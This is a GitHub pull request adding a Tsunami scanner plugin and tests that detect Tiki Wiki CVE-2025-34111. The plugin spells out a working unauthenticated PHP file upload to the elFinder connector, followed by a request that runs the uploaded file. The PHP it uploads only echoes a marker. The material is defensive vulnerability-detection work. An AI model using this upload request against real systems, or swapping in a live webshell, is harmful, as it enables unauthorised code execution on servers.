Skip to content

add tikiwiki CVE-2025-34111 templated plugins #696

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
copybara-service merged 13 commits into from
Oct 8, 2025
Merged

add tikiwiki CVE-2025-34111 templated plugins #696

Show file tree
Hide file tree
Changes from 12 commits
Commits
Show all changes
13 commits
Select commit Hold shift + click to select a range
49d8db5
add tikiwiki templated plugins
crackatoa Aug 21, 2025
ff2afdf
add test
crackatoa Aug 23, 2025
7350aac
fix test
crackatoa Aug 27, 2025
3e911dc
Update templated/templateddetector/plugins/cve/2025/Tikiwiki_CVE_2025…
crackatoa Sep 7, 2025
81ccd52
Update templated/templateddetector/plugins/cve/2025/Tikiwiki_CVE_2025…
crackatoa Sep 7, 2025
e669578
Update templated/templateddetector/plugins/cve/2025/Tikiwiki_CVE_2025…
crackatoa Sep 7, 2025
3acfde1
Update templated/templateddetector/plugins/cve/2025/Tikiwiki_CVE_2025…
crackatoa Sep 7, 2025
07c3ac3
Update templated/templateddetector/plugins/cve/2025/Tikiwiki_CVE_2025…
crackatoa Sep 7, 2025
491af54
Update templated/templateddetector/plugins/cve/2025/Tikiwiki_CVE_2025…
crackatoa Sep 7, 2025
899b6b7
update payload url to static
crackatoa Sep 7, 2025
fb4596b
Update templated/templateddetector/plugins/cve/2025/Tikiwiki_CVE_2025…
crackatoa Sep 12, 2025
df120da
Merge branch 'google:master' into tikiwiki-cve-2025-34111
crackatoa Sep 13, 2025
108103c
Remove trailing spaces
tooryx Oct 8, 2025
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
101 changes: 101 additions & 0 deletions templated/templateddetector/plugins/cve/2025/Tikiwiki_CVE_2025_34111.textproto
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,101 @@
# proto-file: proto/templated_plugin.proto
# proto-message: TemplatedPlugin

###############
# PLUGIN INFO #
###############

info: {
type: VULN_DETECTION
name: "Tikiwiki_CVE_2025_34111"
author: "[email protected]"
version: "1.0"
}

finding: {
main_id: {
publisher: "GOOGLE"
value: "CVE-2025-34111"
}
severity: CRITICAL
title: "Tiki Wiki Unauthenticated File Upload (CVE-2025-34111)"
description: "Tiki Wiki versions <= 15.1 are susceptible to unauthenticated file upload that leads to remote code execution. A remote and unauthenticated attacker can send crafted HTTP requests from this endpoint to upload malicious php file to get remote code execution."
recommendation: "Update Tiki Wiki to version 15.2 or later."
related_id: {
publisher: "CVE"
value: "CVE-2025-34111"
}
}

config: {}

###########
# ACTIONS #
###########

actions: {
name: "tikiwiki_fingerprint"
http_request: {
method: GET
uri: "/tiki-index.php"
response: {
http_status: 200
expect_all: {
conditions: [
{ body: {} contains: "Tiki Wiki CMS" }
]
}
}
}
}

actions: {
name: "tikiwiki_upload_php_webshell"
http_request: {
method: POST
uri: "/vendor_extra/elfinder/php/connector.minimal.php"
headers: [
{ name: "Content-Type" value: "multipart/form-data; boundary=da77a42118180b4af01977b6627ab7ab" }
]
data: "--da77a42118180b4af01977b6627ab7ab\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n--da77a42118180b4af01977b6627ab7ab\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n--da77a42118180b4af01977b6627ab7ab\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"tsunami_security_scan.php\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php echo \"valid_\" . \"{{ payload }}\";?>\r\n--da77a42118180b4af01977b6627ab7ab--\r\n"
response: {
http_status: 200
expect_all:{
conditions:[
{ body: {} contains: "added" }
]
}
}
}
}

actions: {
name: "tikiwiki_trigger_code_execution"
http_request: {
method: GET
uri: "/vendor_extra/elfinder/files/tsunami_security_scan.php"
response: {
http_status: 200
expect_all: {
conditions: [
{ body: {} contains: "valid_tsunami" }
]
}
}
}
}

#############
# WORKFLOWS #
#############

workflows: {
variables: [
{ name: "payload" value:"tsunami_{{ T_UTL_CURRENT_TIMESTAMP_MS }}"}
]
actions: [
"tikiwiki_fingerprint",
"tikiwiki_upload_php_webshell",
"tikiwiki_trigger_code_execution"
]
}
67 changes: 67 additions & 0 deletions templated/templateddetector/plugins/cve/2025/Tikiwiki_CVE_2025_34111_test.textproto
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,67 @@
# proto-file: proto/templated_plugin_tests.proto
# proto-message: TemplatedPluginTests

config: {
tested_plugin: "Tikiwiki_CVE_2025_34111"
}

tests: {
name: "whenVulnerable_returnsTrue"
expect_vulnerability: true

mock_http_server: {
mock_responses: [
{
uri: "/tiki-index.php"
status: 200
body_content: '<meta name="generator" content="Tiki Wiki CMS Groupware">'
},
{
uri: "/vendor_extra/elfinder/php/connector.minimal.php"
status: 200
body_content: "added"
},
{
uri: "/vendor_extra/elfinder/files/tsunami_security_scan.php"
status: 200
body_content: "valid_tsunami"
}
]
}
}

tests: {
name: "whenNotVulnerable_returnsFalse"
expect_vulnerability: false

mock_http_server: {
mock_responses: [
{
uri: "/tiki-index.php"
status: 200
body_content: '<meta name="generator" content="Tiki Wiki CMS Groupware - https://tiki.org">'
},
{
uri: "/vendor_extra/elfinder/php/connector.minimal.php"
status: 200
body_content: "error"
}
]
}
}

tests: {
name: "whenNotTikiwiki_returnsFalse"
expect_vulnerability: false

mock_http_server: {
mock_responses: [
{
uri: "TSUNAMI_MAGIC_ANY_URI"
status: 200
body_content: "Hello world"
}
]
}
}